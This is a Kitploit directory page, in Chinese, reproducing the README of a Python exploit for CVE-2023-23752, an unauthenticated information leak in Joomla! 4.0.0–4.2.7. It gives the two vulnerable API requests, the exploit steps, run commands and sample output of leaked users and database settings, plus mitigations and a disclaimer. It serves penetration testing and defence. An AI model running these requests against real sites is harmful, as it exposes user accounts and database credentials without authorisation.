Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/bardlaudian/cve-2023-23752
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubbardlaudian/cve-2023-23752

CVE-2023-23752

Python 移植的 CVE-2023-23752 漏洞利用程序 — Joomla! < 4.2.8 未认证信息泄露(用户列表 + 数据库凭据泄露)

查看仓库
21个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-23752 — Joomla! < 4.2.8 未授权信息泄露

Python CVE Platform

⚠️ 免责声明: 此工具仅供教育目的和授权渗透测试使用。仅可针对您拥有或已获得明确书面许可的系统进行测试。未经授权的使用是非法的。


目录

  • 概述
  • 漏洞详情
  • 工作原理
  • 要求
  • 安装
  • 用法
  • 示例
  • 缓解措施
  • 鸣谢
  • 参考

概述

Joomla! 是使用最广泛的开源内容管理系统(CMS)之一。版本 4.0.0 至 4.2.7 暴露了两个没有适当访问控制的 API 端点,允许未授权的攻击者获取敏感信息:已注册的用户帐户,以及在易受攻击的配置中,网站的数据库凭据。

该漏洞由 NSFOCUS 天机实验室的 Zewei Zhang 发现并向 Joomla! 项目披露,该项目在 4.2.8 版本中发布了补丁。该漏洞被分配为 CVE-2023-23752。

此仓库包含由 ACCEIS 发布的原始 Ruby 漏洞利用的 Python 移植版。


漏洞详情


工作原理

Joomla 的 REST API Web 服务端点本应在返回数据前强制执行身份验证和访问检查。在受影响版本中,当使用 public=true 查询参数调用时,有两个端点未能正确执行此检查,将请求视为来自匿名“公共”访问级别(该级别应仅暴露非敏感数据),但却泄露了内部信息。

易受攻击的端点

root@kitploit:~
GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
  • users 端点返回完整注册帐户列表:ID、显示名称、用户名、电子邮件和组成员身份。
  • config 端点返回应用程序配置,包括——当安装程序未被删除或加固时——数据库主机、用户名、密码、数据库名称、前缀和加密设置。

漏洞利用流程

脚本自动化以下步骤:

root@kitploit:~
1. 向 /api/index.php/v1/users?public=true 发送 GET 请求
2. 解析 JSON:API 响应并提取用户记录
3. 向 /api/index.php/v1/config/application?public=true 发送 GET 请求
4. 解析 JSON:API 响应并提取站点和数据库配置
5. 将两组数据打印到控制台

整个过程无需身份验证、会话或 CSRF token——整个攻击仅需两个未授权的 GET 请求。


要求

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests --break-system-packages

安装

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages

用法

root@kitploit:~
usage: CVE-2023-23752.py [-h] url

positional arguments:
  url         目标的基础 URL,例如 http://dev.devvortex.htb

options:
  -h, --help  显示此帮助信息并退出

示例

基本用法

root@kitploit:~
python3 CVE-2023-23752.py http://127.0.0.1:4242

针对 HTB 风格的目标

root@kitploit:~
python3 CVE-2023-23752.py http://dev.devvortex.htb

示例输出

root@kitploit:~
=== Users ===
  [123] Administrator (admin) - [email protected] - ['Super Users']

=== Site info ===
  Site name: My Site
  Editor: tinymce
  Captcha: 0
  Access: 1
  Debug status: False

=== Database info ===
  DB type: mysqli
  DB host: localhost
  DB user: joomla_user
  DB password: ********
  DB name: joomla_db
  DB prefix: sd8f2_
  DB encryption: 0

缓解措施

  • 更新 Joomla! 至 4.2.8 或更高版本——这是唯一的完整修复。
  • 限制访问 Web 服务器或 WAF 级别的 /api/index.php/* 路径——如果无法立即升级。
  • 轮换凭据 对于可能通过此端点暴露的任何帐户或数据库用户,在打补丁之前。
  • 监控访问日志 检查对 /api/index.php/v1/ Web 服务路径的未授权请求。

鸣谢

  • 漏洞发现者: Zewei Zhang,NSFOCUS 天机实验室
  • 原始漏洞利用(Ruby): noraj (Alexandre ZANNI) 为 ACCEIS 所写 — 原始仓库
  • Python 移植版: Bardlaudian

参考

  • NVD — CVE-2023-23752
  • Exploit-DB — EDB-51334
  • PacketStorm 公告
  • Joomla! 安全公告
  • 发现者公告 — NSFOCUS
  • 原始 Ruby 漏洞利用 — Acceis
下载工具
字段
值
CVECVE-2023-23752
受影响版本Joomla! 4.0.0 – 4.2.7
类型不恰当的访问控制 / 信息泄露
所需权限无(未授权)
影响泄露用户帐户和数据库凭据
补丁版本Joomla! 4.2.8(2023 年发布)